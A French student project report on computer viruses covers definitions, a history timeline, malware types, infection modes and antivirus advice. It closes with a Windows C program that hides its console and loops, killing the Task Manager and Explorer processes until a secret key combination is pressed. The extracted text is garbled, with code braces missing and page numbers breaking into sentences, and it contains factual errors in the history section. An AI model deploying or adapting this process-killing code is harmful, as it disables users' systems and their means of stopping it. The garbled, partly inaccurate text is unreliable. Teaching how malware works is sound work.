Virus Informatiques

Projet de Fin de Module

25/04/2010

Module : Système d’Exploitation

Encadré par :
M. Abderrahim SABOUR

Réalisé par :

Abdelouahed ERROUAGUI

Ahmed JNAH

Hamid IMIHI

Yassine ELQANDIL
 Sommaire
Sommaire............................................................................................................... 2

Introduction :.......................................................................................................3

Définitions :.........................................................................................................4

Historique :.......................................................................................................... 4

Type des virus :...................................................................................................6

Cycle De Vie Des Virus Informatique :...............................................................12

Modes d’infection :(fonctionnement).................................................................14

Les Mesures pour protéger mon ordinateur contre les virus............................17

Exemple de virus...............................................................................................20

Conclusion :.......................................................................................................24

2Virus Informatiques
 Introduction :
Dans le cadre des mini-projets du module système d’exploitation encadré
par M. Abderrahim SABOUR, nous avons eu l’occasion d’étudier le sujet :
Virus Informatiques.

Nous avons décidé de prendre ce sujet comme mini-projet pour arriver à

comprendre comment les virus fonctionnent réellement, et pour
décortiquer un virus programmé en C.

Dans ce rapport nous avons séparé notre étude en deux parties :

1. Partie Théorique :

1.1. Définition

1.2. Historique

1.3. Types des virus Informatique

1.4. Cycle de vie

3Virus Informatiques
1.5. Mode de fonctionnement

2. Partie Pratique :

2.1. Etude de cas d’un virus en C

 Définitions :

Un Virus est un programme susceptible d'entraîner des perturbations dans

le fonctionnement d'un ordinateur en dénaturant ses programmes
exécutables ou ses fichiers système. Il se transmet généralement par
l'intermédiaire de disquettes ou encore par téléchargement. La plupart
des virus informatiques ajoutent quelques lignes de commandes dans le
fichier cible lorsqu'ils sont chargés en mémoire. Ces commandes ont
généralement. Actuellement, il existe de nombreux types de virus
informatiques, toujours plus sournois et moins visibles. Un virus capable
de se propager à travers des réseaux informatiques est parfois appelé ver,
en particulier lorsqu'il se compose de plusieurs segments dispersés à
4Virus Informatiques
travers le réseau. Un virus peut rester dans la mémoire de l'ordinateur,
constituant dans ce cas un programme terminate-and-stay-resident (TSR) :
on dit alors qu'il s'agit d'un virus résident mémoire. Il peut en outre être
encrypté, rendant ainsi sa détection et sa résorption plus délicates. Enfin,
il peut être polymorphe, évitant d'être décelé grâce à un changement
interne de sa structure.

Historique :
• 1949 : John Von Neumann présente les fondements théoriques des
logiciels autocopiés.

• 1960 : Un groupe de jeunes ingénieurs des laboratoires Bell met au

point un jeu informatique du nom de Core war : on installe dans la
mémoire vive d'un ordinateur deux programmes chargés de se
retrouver. Le gagnant doit détruire l'autre en s'autocopiant dans ses
fichiers.
 • 1984 : Le magazine Scientific American présente un guide pour
fabriquer ses propres virus.

• 1986 : Les frères Alvi, deux Pakistanais, fournissent à des touristes

des copies de logiciels pirates infectés du virus Brain. Ce serait le
premier virus clairement identifié et connu. Il a causé de sérieux
dégâts sur les campus américains.

• 1988 : Peace/Mac affiche son message de paix universelle sur les

écrans de possesseurs de Macintosh II.

• 1988 : Robent Morris est arrêté pour fraude informatique. Cet

étudiant vient de causer 15 millions de dollars de dommage sur
Internet à cause de son virus.

• 1989 : Datacrime : trois virus font trembler les Pays-Bas et la France.

La police néerlandaise propose alors un ensemble de programmes
informatiques à bas prix pour lutter contre ces virus. C'est à cette
époque que la France prend réellement conscience de l'existence
5Virus Informatiques
des virus.

• 1991 : Diffusé par une disquette vendue dans la revue Soft et Micro,
le virus Frodo/4096 arrive en France. Le Clusif (Club de la sécurité
des systèmes d'information français) propose sur son serveur une
procédure de détection et de décontamination pour lutter contre
Frodo. Le serveur enregistre 8 000 connexions.

• 1992 : Le virus Michelangelo plonge la planète dans l'effroi. Ses

effets restent pourtant limités : 200 000 machines, au lieu des 5 à
15 millions annoncés.

• 1995 : Les premiers virus macros destructeurs apparurent en été.

• 1998 : D'après les chiffres publiés par Dr Salomon's, éditeur

d'antivirus, on recensait 17 745 virus différents en 1998, contre 18
en 1989.

• 1999 : Le virus Mélissa se propage par internet. Caché dans un

document Word, Mélissa s'auto envoyait aux 50 premiers contacts
 contenus dans le carnet d'adresses d'Outlook. Résultat : plus de 300
000 ordinateurs infectés. Internet devenait le premier vecteur de
contamination.

• 2000 : Le virus I Love You sème de nouveau la panique sur Internet.

• 2003 : Le virus MyDoom a beaucoup fait parler de lui, et la tête de

l'auteur de ce dernier reste mise à prix.

Type des virus :

 Vers :
♦ Qu’est-ce que c’est ?

Un ver informatique (en anglais Worm) est un

programme qui peut s'auto-reproduire et se
déplacer à travers un réseau en utilisant les
mécanismes réseau, sans avoir réellement besoin
d'un support physique ou logique (disque dur,
programme hôte, fichier, etc.) pour se propager;
6Virus Informatiques un ver est donc un virus réseau.

♦ Le fonctionnement d'un ver dans les années 80 :

La plus célèbre anecdote à propos des vers date de 1988. Un étudiant

(Robert T. Morris, de Cornell University) avait fabriqué un programme
capable de se propager sur un réseau, il le lança et, 8 heures après l'avoir
lâché, celui-ci avait déjà infecté plusieurs milliers d'ordinateurs. C'est ainsi
que de nombreux ordinateurs sont tombés en pannes en quelques heures
car le « ver » (car c'est bien d'un ver dont il s'agissait) se reproduisait trop
vite pour qu'il puisse être effacé sur le réseau. De plus, tous ces vers ont
créé une saturation au niveau de la bande passante, ce qui a obligé la NSA
à arrêter les connexions pendant une journée.

Voici la manière dont le ver de Morris se propageait sur le réseau :

• Le ver s'introduisait sur une machine de type UNIX

• il dressait une liste des machines connectées à celle-ci
• il forçait les mots de passe à partir d'une liste de mots
• il se faisait passer pour un utilisateur auprès des autres machines
• il créait un petit programme sur la machine pour pouvoir se
reproduire
• il se dissimulait sur la machine infectée
• et ainsi de suite
 ♦ Les vers actuels :

Les vers actuels se propagent principalement grâce à la messagerie (et

notamment par le client de messagerie Outlook) grâce à des fichiers
attachés contenant des instructions permettant de récupérer l'ensemble
des adresses de courrier contenues dans le carnet d'adresse et en
envoyant des copies d'eux-mêmes à tous ces destinataires.

Ces vers sont la plupart du temps des scripts (généralement VB Script) ou

des fichiers exécutables envoyés en pièce jointe et se déclenchant lorsque
l'utilisateur destinataire clique sur le fichier attaché.

 Chevaux de Troie :
♦ Qu’est-ce que c’est ?

Un cheval de Troie (informatique) est donc

un programme caché dans un autre qui
exécute des commandes sournoises, et qui
7Virus Informatiques généralement donne un accès à l'ordinateur
sur lequel il est exécuté en ouvrant une
porte dérobée

Les chevaux de Troie par porte dérobée sont des programmes qui
autorisent d’autres personnes que vous à prendre le contrôle de votre
ordinateur au travers d’Internet.ils sont parfois utilisés comme moyen
d’installer un virus chez un utilisateur.

♦ Les symptômes d'une infection :

Le principe des chevaux de Troie étant généralement (et de plus en plus)

d'ouvrir un port de votre machine pour permettre à un pirate d'en prendre
le contrôle (par exemple voler des données personnelles stockées sur le
disque), le but du pirate est dans un premier temps d'infecter votre
machine en vous faisant ouvrir un fichier infecté contenant le troyen
(trojan) et dans un second temps d'accéder à votre machine par le port
qu'il a ouvert.
 Toutefois pour pouvoir s'infiltrer sur votre machine, le pirate doit
généralement en connaître l'adresse IP. Ainsi :

soit vous avez une adresse IP fixe (cas d'une entreprise ou bien parfois de
particuliers connecté par câble, etc.) auquel cas l'adresse IP peut être
facilement récupérée

soit votre adresse IP est dynamique (affectée à chaque connexion), c'est le

cas pour les connexions par modem ; auquel cas le pirate doit scanner des
adresses IP au hasard afin de déceler les adresses IP correspondant à des
machines infectées.

♦ Liste des ports utilisés habituellement par les troyens :

por Troyen
t
21 Back construction, Blade runner, Doly, Fore, FTP trojan,
Invisible FTP, Larva, WebEx, WinCrash
23 TTS (Tiny Telnet Server)
8Virus Informatiques
25 Ajan, Antigen, Email Password Sender, Happy99, Kuang 2,
ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC,
WinSpy
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat
59 DMSetup

 Canular :
♦ Qu’est-ce qu’un hoax?

On appelle hoax (en français canular) un courrier électronique propageant

une fausse information et poussant le destinataire à diffuser la fausse
nouvelle à tous ses proches ou collègues.
Ainsi, de plus en plus de personnes font suivre des informations reçues par
courriel sans vérifier la véracité des propos qui y sont contenus. Le but des
hoax est simple :
• provoquer la satisfaction de son concepteur d'avoir berné un grand
nombre de personnes
Les conséquences de ces canulars sont multiples :
 • L'engorgement des réseaux en provoquant une masse de données
superflues circulant dans les infrastructures réseaux ;
• Une désinformation, c'est-à-dire faire admettre à de nombreuses
personnes de faux concepts ou véhiculer de fausses rumeurs (on
parle de légendes urbaines) ;
• L'encombrement des boîtes aux lettres électroniques déjà chargées ;
• La perte de temps, tant pour ceux qui lisent l'information, que pour
ceux qui la relayent ;
• La dégradation de l'image d'une personne ou bien d'une entreprise ;
• L'incrédulité : à force de recevoir de fausses alertes les usagers du
réseau risquent de ne plus croire aux vraies.
 Virus du Secteur de Démarrage :

♦ Qu’est-ce qu’un virus secteur de démarrage ?

Les virus de secteur d'amorçage résident dans le

premier secteur d'un support physique (disque dur
ou disquette) ou du système d'exploitation (DOS
ou Windows en général).
Le contenu original du secteur est déplacé vers
une autre zone du disque et le virus s'octroie cet
emplacement.
Ce positionnement leurs permets (ces virus sont
9Virus Informatiques amorcés dès le démarrage) d'être activé avant
tout le reste, leur conférant ainsi, un contrôle
important de l'ordinateur. Ces virus se chargent généralement en
mémoire vive et y demeurent jusqu'à la mise hors tension de l'ordinateur.
Ils se distinguent principalement par leur mode de contagion, leurs
conséquences ne varient pas, destruction de fichiers, de données voire
reformatage. Heureusement, la plupart des virus de boot ne fonctionnent
plus sous les nouveaux systèmes d'exploitation tels que Windows NT et
tendent à disparaître progressivement.
 Virus Macro :
♦ Qu’est-ce qu’un virus de macro ?

Les virus Macros sont la plus grande menace à

ce jour, ils se propagent lorsqu’un document
Microsoft Word, Excel ou PowerPoint contaminé
est exécuté. Un virus Macro est une série de
commandes permettant d’effectuer un certain
nombre de tâches automatiquement au sein des
applications ci-dessus. Le but non nuisible du
 langage de macro dans ces applications est à l’origine de pouvoir créer
des raccourcis pour effectuer des tâches courantes, par exemple en une
touche imprimer un document, le sauvegarder et fermer l’application.

Les Virus Macros non supprimés se répandent très rapidement.

L’ouverture d’un document infecté va contaminer le document par défaut
de l’application, et ensuite tous les documents qui seront ouverts au sein
de l’application. Les documents Word, Excel et PowerPoint étant les
documents les plus souvent partagés, envoyés par Internet, ceci explique
la diffusion rapide de ces virus. De plus le langage de programmation des
Macros est beaucoup plus facile à apprendre et moins compliqué qu’un
langage de programmation classique.

 Mails :
♦ Qu’est-ce que c’est ?

10Virus Informatiques Les virus des mails sont capables

d’infecter les utilisateurs à la lecture
d’un mail. Ils ont l’apparence de
n’importe quel autre message, mais
contiennent pourtant un script caché qui
s’exécute dès que vous ouvrez le mail,
ou même le pré visualisez dans le panneau d’aperçu (si tant est que vous
utilisiez Outlook avec la version correcte d’Internet Explorer). Ce script
peut changer les paramètres de votre système et envoyer le virus à
d’autres utilisateurs par mail.

♦ Les virus qui se propagent automatiquement par mail :

Ce sont les virus typiques qui s’activent par un simple clic de l’utilisateur
sur le document joint. Celui-ci exécute un script qui utilise les programmes
de messagerie pour faire suivre les documents infectés à d’autres
utilisateurs de mails. Melissa, par exemple, envoie un message aux
cinquante premiers contacts de tous les carnets d’adresses auxquels
 Microsoft Outlook peut accéder. D’autres virus s’envoient d’eux-mêmes à
tous les contacts du carnet d’adresse.

♦ Qu’est-ce qu’un spam ?

Un spam est un mail non sollicité, qui fait souvent la promotion de plans
d’enrichissement rapide, d’emplois à domicile, de prêts bancaires ou de
sites à caractère pornographique. Les spams arrivent souvent avec de
fausses références sur l’expéditeur, d’où la difficulté à réagir contre leur
auteur. Ces mails doivent simplement être détruits.

♦ Les pièces jointes :

Le risque vient des logiciels de messageries qui sont installés sur votre
ordinateur, surtout la messagerie Outlook Express, client de
messagerie fourni avec Windows XP, à cause de son faible niveau de
sécurité face aux agressions venant d'Internet.

Pour l'internaute, l'utilisation de la messagerie reste l'échange de courrier

au format texte. De façon plus avancée, vous pouvez :
11Virus Informatiques
- soit transmettre un fichier informatique : document Word, Excel, une
image (type photo) ou une archive compressée.

- soit recevoir un document d'un correspondant. Ces pièces-jointes

correspondent aux documents que l'on reçoit. .

Donc le danger vient de ces documents transmis, surtout s'il s'agit d'un
fichier exécutable avec une extension :.com, .bat, .exe même si la pièce-
jointe est envoyée par une personne connue, le document peut contenir
un parasite : virus, vers... qui peut contaminer votre ordinateur si ce
fichier est exécuté. Si vous ouvrez par inadvertance un document infecté,
vous installez le parasite sur votre machine, le processus est enclenché,
le virus va utiliser votre carnet d'adresse pour se propager et contaminer
les contacts de votre carnet.

 Les spywares :
♦ Qu’est-ce que c’est ?
 Un spyware est un logiciel espion. C'est un programme ou un sous-
programme conçu dans le but de collecter des données personnelles sur
ses utilisateurs et de les envoyer à son concepteur ou à un tiers via
Internet ou tout autre réseau informatique, sans avoir obtenu au préalable
une autorisation de l'utilisateur. Les spywares ont pour objectif primaire,
d’espionner le comportement de l’internaute et de transmettre ensuite, à
son insu, les informations collectées aux créateurs et éditeurs de logiciels
afin d’alimenter une gigantesque base de données.

♦ Comment cela fonctionne-t-il ?

Un spyware « s’attrape » en général en naviguant sur Internet, ainsi

qu'en téléchargeant des logiciels gratuits (freeware) ou de publicité
(adware). Il est tout particulièrement fréquent dans les programmes de
messagerie instantanée (ICQ), les lecteurs audio (RealPlayer) et les
systèmes «peer-to-peer » (Kazaa, Limewire).

Le spyware lui-même est un programme autonome ou associé à un logiciel

prévu pour tout autre chose. Il utilise alors des techniques comme
12Virus Informatiques
l'ingénierie sociale ou celles des chevaux de Troie.

Cycle De Vie Des Virus Informatique :

Les virus informatiques, tout comme les virus biologiques, possèdent un
cycle de vie :

 Création:
C’est la période que va passer un programmeur à développer un virus
aussi féroce que possible. La programmation se fait en code assembleur.

 Gestation:
 Il s'agit du procédé par lequel le virus est copié en un endroit stratégique
afin que sa diffusion soit la plus rapide possible. En général, la méthode
consiste à infecter un programme très populaire puis à le distribuer par
l'intermédiaire d'un serveur BBS, du courrier électronique, de l'Internet ou
au sein d'une entreprise, d'une école, etc.

 Reproduction (infection):
Les virus, de par leur nature, cherchent à se reproduire. Un virus
correctement conçu se reproduira un nombre de fois important avant de
s'activer. C'est là le meilleur moyen de s'assurer de la pérennité d'un
virus.

 Activation:
Les virus possédant une routine de destruction ne s'activent que lorsque
certaines conditions sont réunies. Certains s'activent à certaines dates,
d'autres possèdent un système de compte à rebours interne. Même les
13Virus
virus Informatiques
ne possédant pas de telles routines et ne nécessitant pas de
procédure d'activation spécifique peuvent causer des dommages à votre
système en s'appropriant petit à petit l'ensemble de vos ressources.

 Découverte:
Cette phase de l'existence d'un virus n'est pas forcément consécutive à
son activation, mais c'est généralement à ce moment-là qu'elle a lieu. La
découverte d'un virus est le moment où quelqu'un se rend compte de sa
présence et parvient à l'isoler. Une fois cette opération réalisée, le
nouveau virus est généralement transmis au NCSA (National Computer
Security Association) à Washington DC où il est documenté puis distribué
aux développeurs de logiciels antivirus. La découverte a lieu la plupart du
temps au moins un an avant qu'un virus ne devienne une véritable
menace pour la communauté informatique.

 Assimilation:
 Une fois la découverte faite, les développeurs de logiciels modifient leurs
programmes pour qu'ils puissent détecter la présence du virus. Cette
phase dure entre un jour et six mois, selon la compétence du développeur
d'anti- virus.

 Elimination:
Si un nombre suffisant de développeurs d'antivirus sont capables de faire
face au virus et si suffisamment de personnes se procurent l'antivirus
adéquat, il est possible d'annihiler un virus. Dans les faits, aucun virus n'a
réellement disparu, mais un grand nombre d'entre eux ont cessé de
constituer une menace réelle.

Modes d’infection :(fonctionnement)

Modes d'infection Les différentes techniques décrites ci-dessous s’appliquent
principalement aux virus programmes. Certaines d’entre elles s’appliquent
néanmoins aux virus interprétés. Il existe en effet des virus « par recouvrement »
et « par ajout » parmi les macrovirus et les virus de script.
14Virus Informatiques

 Recouvrement :
Un virus par recouvrement se contente d’écraser partiellement ou en totalité le
programme qu’il infecte. En conséquence, il le détruit au moins partiellement et
rend son éradication impossible. Dans certains cas, la taille du programme
infecté n’est pas modifiée ; dans les cas contraires, celle-ci s’ajuste à la taille du
code viral et devient identique pour tout fichier infecté. La destruction, même
partielle, du code originel fait que celui-ci ne peut plus fonctionner correctement.
Ces virus ne sont généralement pas résident en mémoire. Ne réalisant plus la
fonction souhaitée, l’utilisateur les détecte rapidement. Les virus agissant par
recouvrement ne réussissent jamais à se disséminer largement.

Exemple : BadGuy, W32/HLL.ow.Jetto, LINUX/Radix.ow, VBS/Entice.ow.

 Le virus écrase une partie du code du programme hôte

 Ajout :
Un virus par ajout modifie un programme sans le détruire. Ayant altéré le point
d'entrée, le virus s’exécute chaque fois que le programme est lancé, puis lui «
15Virus Informatiques
rend la main ». Celui-ci fonctionne alors de façon normale. La force d’un virus par
ajout est que le programme infecté semble fonctionner correctement ce qui peut
retarder la détection du virus. La faiblesse d’un virus par ajout est que la taille du
programme est augmentée de la taille du virus, ce qui rend un repérage fondé
sur la variation de la taille des programmes possible.

Exemples: Cascade, Jérusalem, W95/Anxiety, W32/Chiton, VBS/Daydream.

Le virus greffe son code sur le programme hôte

  Cavité :
Connaissant la structure spécifique du type des programmes à contaminer, le
virus modifie le point d'entrée du programme et insère tout ou partie de son code
dans différentes zones non utilisées. Le fichier COMMAND.COM fut longtemps la
cible privilégiée de ce genre de virus ; dans ce cas, le code viral pouvait se situer
entre le bloc de code, le bloc des données, le bloc de pile « stack ». Cette
technique est maintenant régulièrement rencontrée dans les environnements
Windows.

Exemple : W95/Caw.

Le virus morcelle son code en modules insérés dans les espaces

inoccupés du programme hôte

16Virus Informatiques

 Point d'entrée obscure :

Avant infection, l'analyse du programme cible permet un positionnement du
point d'entrée du code viral en un lieu variable au sein du fichier. Le point
d’entrée du programme et les instructions qui s’y situent sont inchangés. Lorsque
cette technique est associée à une infection par cavité et à un codage
polymorphique, la détection devient très problématique. Cette technique est
maintenant régulièrement rencontrée dans les environnements Windows. Elle est

Le virus place son point d'entrée dans un endroit variable du

 très pénalisante pour les antivirus qui doivent parfois élargir fortement leur zone
de recherche. Exemple : W95/Orez.

Les Mesures pour protéger mon ordinateur

contre les virus
Internet est un outil de travail merveilleux, mais aussi un endroit où les virus
voyagent en grand nombre et en tout temps. Heureusement, il existe des
moyens pour vous protéger contre ces virus, dont la protection avec les logiciels
antivirus.

Si vous êtes aux prises de virus, soit vous n'avez pas installé un logiciel antivirus
ou encore, votre logiciel n'a pas réussi à tout arrêter. La première chose à faire
est de lancer un scan de tous vos disques installés dans votre ordinateur à l'aide
de votre logiciel antivirus. Ensuite, lancez également un scan de vos dossiers et
fichiers à l'aide d'un logiciel anti-espion. De cette manière, vous éliminerez les
virus, ainsi que les logiciels espions qui se sont infiltrés dans votre ordinateur à
votre insu.

Il existe plusieurs bons logiciels anti-virus gratuits sur le marché. Pour éliminer
17Virus Informatiques
définitivement les virus informatiques de votre PC, je vous recommande le
logiciel Kaspersky 2010, la version familiale. Une fois installé, le logiciel vous
demandera l'autorisation pour lancer un scan complet de tout votre ordinateur.

 Antivirus/Pare-feu
♦ Qu'est-ce qu'un antivirus ?

Un antivirus est un programme capable de détecter la présence de virus sur un

ordinateur et, dans la mesure du possible, de désinfecter ce dernier. On parle
ainsi d'éradication de virus pour désigner la procédure de nettoyage de
l'ordinateur. Chaque ordinateur, pour assurer sa sécurité sur internet, doit
disposer d'un seul antivirus et d'un seul pare-feu (firewall) (plusieurs antivirus ou
plusieurs pare-feu créent des conflits...).

♦ Qu'est-ce qu'un pare-feu (firewall) ?

Un pare-feu (appelé aussi coupe-feu, garde-barrière ou firewall en anglais), est

un système permettant de protéger un ordinateur ou un réseau d'ordinateurs des
 intrusions provenant d'un réseau tiers (notamment Internet). Le pare-feu est un
système permettant de filtrer les paquets de données échangés avec le réseau.

 Solutions
Voici quelques moyens de protéger votre ordinateur contre les virus:

Solution 1: Les logiciels antivirus

Votre première ligne de défense consiste à installer un logiciel antivirus. Pour

être plus sûr, installez également un logiciel pare-feu, qui est maintenant intégré
dans certains antivirus. Ce logiciel peut balayer tous vos disques de virus et les
neutraliser. Voici quelques éléments à considérer lors de l'évaluation d'un logiciel
antivirus.
- La compatibilité avec votre système d'exploitation. Assurez-vous que le logiciel
fonctionne avec votre système, en particulier si vous utilisez un vieux système
d'exploitation comme Windows 98.
- Protection automatique de fond. Cela signifie que votre logiciel antivirus est
constamment
18Virus en action pour détecter les infections et les neutraliser comme
Informatiques
elles apparaissent. Cela donne une tranquillité d'esprit.
- La fréquence des mises à jour. Comme de nouveaux virus apparaissent chaque
jour, vous aurez besoin de mises à jour régulières. C'est encore mieux si elles se
produisent automatiquement lorsque vous vous connectez à Internet. Si la mise à
jour automatique n'est pas incluse, vous aurez à vérifier vous-même sur Internet
les mises à jour qui doivent être installées dans votre logiciel de sécurité.
- La certification ICSA. La sécurité informatique dispose de normes pour les taux
de détection des logiciels antivirus. Assurez-vous que votre logiciel a la
certification ICSA.
- Le support technique. C'est une bonne idée de choisir un forfait qui offre une
assistance technique gratuite, en ligne ou par le biais d'un numéro sans frais.

Solution 2: Méfiez-vous des extensions de nom de fichier

L'extension d'un nom de fichier est les trois éléments qui viennent après le point.
Windows, par défaut, a caché les extensions de nom de fichier, mais ce n'est pas
une très bonne idée. Pour voir les extensions d’un nom de fichier, cliquez sur le
bouton Démarrer, ensuite sur Panneau de configuration. Choisissez alors Options
 des dossiers et type de fichier. Désactivez la case à cocher Masquer les
extensions des fichiers dont le type est connu. Cliquez sur Appliquer.

Solution 3: Méfiez-vous des inconnus .exe

Un virus est un logiciel qui doit être exécuté afin de faire son sale boulot. Les
virus ont généralement comme extension, exe. Malheureusement, c'est le même
dans Program Files. Alors, ne paniquez pas si vous trouvez des fichiers nommés
Word.exe ou Excel.exe sur votre système; il s’agit seulement de vos logiciels
Microsoft. Il suffit de ne jamais ouvrir un fichier avec une extension .exe si vous
ne savez pas la raison d'être de ce fichier.

Solution 4: Protéger les macros de MS Word, Excel et Powerpoint

Les macros virus sont un autre type de virus. Les macros sont des ensembles de
commandes que les utilisateurs peuvent enregistrer en tant que raccourcis pour
exécuter des fonctions parfois longues en quelques frappes de touche seulement.
Un virus
19Virus de macro peut verrouiller le clavier et même faire la suppression de
Informatiques
fichiers. Word, Excel, PowerPoint viennent tous avec une fonction pour vous
protéger contre les virus macros. Pour vous assurer que le vôtre est activé,
cliquez sur le menu Outils, Macro et Sécurité. Sur l'onglet Niveau de sécurité,
assurez-vous que moyen ou élevé est sélectionné.

Solution 5: Utiliser des mots de passe

Si vous partagez votre ordinateur, c'est une bonne idée d'attribuer à chacun un
mot de passe. Les mots de passe doivent être une combinaison d'au moins huit
caractères, des lettres et des chiffres, et de préférence n’ayant aucun sens.

Solution 6: Mise à jour du logiciel d'application

des Microsoft effectue constamment correctifs pour les failles de sécurité dans
son système d'exploitation et les logiciels d'application. Il est donc important
d’effectuer les mises à jour de Windows fréquemment. Pour obtenir les correctifs
de sécurité les plus récents.
 Exemple de virus
 Virus en C :

/**********************************/

//DoubleStopProcess.c

//Compiler Dev-C++ 4.9.9.2

/**********************************/

#include <windows.h>

#include <windowsx.h>

#include <tlhelp32.h>//contient les variable de type PROCESSENTRY32

#include <process.h>

#include<stdlib.h>

#define Progy "taskmgr.exe"

#define Master "explorer.exe"

20Virus Informatiques

int func_termi(void);

int ID,XY,T3;

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,

LPSTR lpCmdLine, int CmdShow)

char message[] = "This programme affects yout taskmanager :) stop me if u cann

TAB+SHIFT+RETURN";

char title[] = "INFORMATION";

HWND nShow;

nShow = FindWindow("ConsoleWindowClass","ConsoleWindowClass");/**3kelt
ta9riban**/

ShowWindow(nShow,SW_HIDE);/**set the specified window's show state.

SW_HIDE :Hides the window

and activates another window.**/

 MessageBox(0,message,title,MB_OK| MB_ICONINFORMATION);/**si title est null

la valeur par défaut est ERROR**/

// _sleep(100);

func_termi();

int func_termi(void)

long code;

HANDLE Snap,Process;/**Le handle est un identifiant qui permet de désigner

l'objet de manière unique.

C'est juste une autre manière de référencer l'objet.

On ne parlera plus d'adresses pour les références

21Virus Informatiques
d'objets managés.**/

PROCESSENTRY32 proc32;/**contient des info sur un processus apres avoir

pris une snapshot des processus qui reside dans

le systeme**/

// BOOL ServiceName;

while(1)

_sleep(100);

Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);/**Tlhelp32.h**/

/**Takes a snapshot of the specified processes,

as well as the heaps, modules, and threads

used by these processes.**/

/** Includes all processes

in the system in the snapshot.

To enumerate the processes**/

 if(Snap==INVALID_HANDLE_VALUE)

MessageBox(0,"Sorry,no way!!!","Error",MB_OK | MB_ICONERROR);

exit(0);

proc32.dwSize=sizeof(PROCESSENTRY32);

if((GetAsyncKeyState(VK_TAB)==-32767)&&(GetAsyncKeyState(VK_SHIFT)==-32767

)&&(GetAsyncKeyState(VK_UP)==-32767))

MessageBox(0,"U knew the key NOOO I'm GOOONE ;","BYE BYE",MB_OK |

MB_ICONEXCLAMATION);

return EXIT_SUCCESS;

while((Process32Next(Snap,&proc32))==TRUE)

if(strcmp(proc32.szExeFile,Progy)==0){/**test
22Virus Informatiques d'egalité entre le proc courant et la
chaine progy **/

ID=proc32.th32ProcessID;

Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);/**Required to
retrieve

certain information about

a process, such as
its token,

exit code, and

priority class*/

XY=GetExitCodeProcess(Process,&code);/**Retrieves the termination

status of the specified process.**/

Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);/**Opens an existing

local process object.**/

T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done!Taskmgr.exe is
stopped!!!","Info",MB_OK);}

else if(strcmp(proc32.szExeFile,Master)==0){/**la meme chose pr l'autre proc**/

 ID=proc32.th32ProcessID;

Process=OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,ID);

XY=GetExitCodeProcess(Process,&code);

Process=OpenProcess(PROCESS_TERMINATE,FALSE,ID);

T3=TerminateProcess(Process,code);{MessageBoxA(0,"Done! Calc.exe is
stopped!!!","Info",MB_OK);}

23Virus Informatiques
 Conclusion :
Le projet nous a appris comment bien lire un code, l’analyser, le modifier et
essayer de se lancer dans ce domaine vague pour atteindre nos objectifs comme
futur informaticiens.

Finalement, nous pouvons dire que ce mini-projet nous a été d’une grande utilité,
vu que c’était un défi qui mérite être attaquer.

24Virus Informatiques